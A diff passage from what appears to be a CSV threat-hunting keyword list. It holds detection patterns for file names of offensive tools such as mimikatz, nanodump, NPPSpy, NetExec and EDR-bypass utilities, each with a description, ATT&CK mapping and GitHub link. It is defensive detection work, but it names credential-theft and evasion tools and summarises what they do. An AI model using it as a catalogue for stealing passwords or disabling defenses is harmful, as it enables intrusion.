- TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*\mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\mhydeath64*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*\mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*\Mockingjay_BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*\modifiableautorun.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*\monkey.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*\monkey32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*\monkey64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*\monkey.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\monkey32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\monkey64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" -"*\MSOL\DomainCompanyInfo.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\msi_search.c*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.exe*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.ps1*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.x64.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.x86.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\MSOL\DomainCompanyInfo.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" "*\nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*\nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\net*\ftpagent.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" -"*\NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*\netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\netexec.yml*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NetExec-main\*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\NetLoader.exe*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*\NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\NimBlackout*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" -"*\NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*\NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*\Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*\Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*\NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\nopac.exe*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" -"*\NoPowerShell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*\NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*\No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*\No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*\NPPSpy.c*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*\NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*\NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*\NPPSpy.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NoPowerShell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.c*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*\ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*\ntdlol.txt*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*\ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*\NTLMRelay2Self*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" "*\ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM 